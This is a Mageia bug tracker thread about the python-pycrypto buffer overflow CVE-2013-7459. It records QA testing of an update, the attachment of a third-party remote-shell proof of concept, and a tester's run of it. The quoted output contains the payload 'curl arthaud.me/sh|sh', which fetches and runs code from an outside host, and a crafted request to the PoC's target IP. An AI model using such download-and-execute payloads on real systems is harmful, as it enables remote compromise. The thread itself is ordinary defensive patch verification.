| Summary: | python-pycrypto new security issue CVE-2013-7459 | ||
|---|---|---|---|
| Product: | Mageia | Reporter: | David Walser <luigiwalser> |
| Component: | Security | Assignee: | QA Team <qa-bugs> |
| Status: | RESOLVED FIXED | QA Contact: | Sec team <security> |
| Severity: | normal | ||
| Priority: | Normal | CC: | lewyssmith, makowski.mageia, sysadmin-bugs, tarazed25 |
| Version: | 5 | Keywords: | validated_update |
| Target Milestone: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | https://lwn.net/Vulnerabilities/710478/ | ||
| Whiteboard: | MGA5-64-OK MGA5-32-OK advisory | ||
| Source RPM: | python-pycrypto-2.6.1-8.mga6.src.rpm | CVE: | CVE-2013-7459 |
| Status comment: | |||
| Attachments: |
Random output test for python[3]-pycrypto
POC for this bug, Python script to get a remote shell. |
||
|
Description
David Walser
2016-12-27 19:34:34 CET
David Walser
2016-12-27 19:34:44 CET
Whiteboard:
(none) =>
MGA5TOO python-pycrypto-2.6.1-6.1.mga5 python3-pycrypto-2.6.1-6.1.mga5 from python-pycrypto-2.6.1-6.1.mga5.src.rpm are in 5/core/updates_testing This is a security fix for a possible Buffer overflow ref : http://openwall.com/lists/oss-security/2016/12/27/8 https://github.com/dlitz/pycrypto/commit/8dbe0dc3eea5c689d4f76b37b93fe216cf1f00d4 https://marc.info/?l=oss-security&m=148280482630855&w=2 Cauldron is also patched rpm have it own test suite run during the build, including for this issue. Whiteboard:
MGA5TOO =>
(none)
David Walser
2017-01-03 20:34:16 CET
URL:
(none) =>
https://lwn.net/Vulnerabilities/710478/ Prior to testing. The most recent python-pycrypto bug: https://bugs.mageia.org/show_bug.cgi?id=11491#c0 has some code for *that* problem which I shall attach here simply because it uses the same package. The output (after that old update) should be random. https://marc.info/?l=oss-security&m=148280482630855&w=2 is a fantastically detailed & precise analysis of the bug, with a code exploit which I also will attach here. More 'for the record', since it concludes: "After a few hours, I finally got a shell!" CC:
(none) =>
lewyssmith Created attachment 8841 [details] Random output test for python[3]-pycrypto From bug 11491, this is just a little python script which uses the python-pycrypto package. The 4 lines of output should be random. $ python[3] cryptoRandom.py Created attachment 8842 [details] POC for this bug, Python script to get a remote shell. From https://marc.info/?l=oss-security&m=148280482630855&w=2 for info only. Written for Python3; may work for earlier. Expect it to run for hours before (pre-update only) giving a shell. Testing M5_64 BEFORE update: python-pycrypto-2.6.1-6.mga5 python3-pycrypto-2.6.1-6.mga5 $ python cryptoRandom.py [u'11ebfa07b917df5b,1643424639ad0df8', u'1c75461b81e3808f,7476bd90682ace47', u'3de101081f86ac97,514d5e1c4abb325e', u'c62efc43f35b0b0b,14799ad508334985'] $ python3 cryptoRandom.py [similar sort of O/P] AFTER update: python-pycrypto-2.6.1-6.1.mga5 python3-pycrypto-2.6.1-6.1.mga5 $ python cryptoRandom.py [similar sort of correct O/P as previously] $ python3 cryptoRandom.py [similar sort of correct O/P as previously] So the package still works although its long POC not specifically tested. From Comment 1 "rpm have it own test suite run during the build, including for this issue." OK. Whiteboard:
(none) =>
MGA5-64-OK Advisory created from Comment 1, title, the references. Whiteboard:
MGA5-64-OK =>
MGA5-64-OK advisory Testing on i586 virtualbox.
Thanks for the upload Lewis.
Before updating:
$ python cryptoRandom.py
[u'42364207b0dce3c2,29364e940c3c17c9',
u'50a9812b90741463,3035440668d34d67',
u'e8bfa75fdf36ad24,d2678147321a44a6',
u'f2480379ff1dddac,64aba216bbe90636']
$ python3 cryptoRandom.py
['050e5d799b3ab7c8,26529743331d7995',
'1d1bfaea7011db37,63d5549433c22325',
'86c19227a42ef910,88527138e99cfe25',
'a5a45316ae36ed16,9197abb3d58ed85b']
Running 'python getShell.py' fails on a syntax error.
Noting that the original was written for python3 I tried
$ python3 getShell.py
The systax was accepted but the terminal filled with hundreds of echoes of the 'curl arthaud.me/sh|sh' command and ended on a connection failure:
curl%20arthaud.me%2fsh%7csh%00%00%00%d6%80%15%08 (Caused by ProtocolError('Connection aborted.', ConnectionRefusedError(111, 'Connection refused')))
I wonder if the address targeted needs to be changed to something accessible. No clue really.
$ dig 136.243.194.56
did not provide any useful information.
$ nslookup 136.243.194.56
Server: 192.168.1.1
Address: 192.168.1.1#53
Non-authoritative answer:
56.194.243.136.in-addr.arpa name = ip-136-243-194-56.bb.netbynets.de.
Maybe a German broadband provider?
Worth trying after the update though.CC:
(none) =>
tarazed25 After the update the functionality test worked fine as before, with python and python3. The PoC test with python3 behaved just as before with a final "Connection refused". Should the attempt to get a remote shell have been thwarted immediately if the fix had worked? I defer to a higher authority. Also tried this: $ curl "http://136.243.194.56:8000/cgi-bin/cryptmsg.py?what=enc&msg=AAAAAAAAAAAAAAAA&keyAAAAAAAAAAAAAAAA&mode=42&iv=AAAAAAAAAAAAAAAA" curl: (7) Failed to connect to 136.243.194.56 port 8000: Connection refused (In reply to Len Lawrence from comment #8) > After the update the functionality test worked fine as before, with python > and python3. so you can validate > The PoC test with python3 behaved just as before with a final "Connection > refused". > Should the attempt to get a remote shell have been thwarted immediately if > the > fix had worked? I defer to a higher authority. the security issue is tested during the rpm build. CC:
(none) =>
makowski.mageia Tanks Philippe. letting it go then.
Len Lawrence
2017-02-01 21:52:39 CET
Keywords:
(none) =>
validated_update An update for this issue has been pushed to the Mageia Updates repository. http://advisories.mageia.org/MGASA-2017-0032.html Resolution:
(none) =>
FIXED |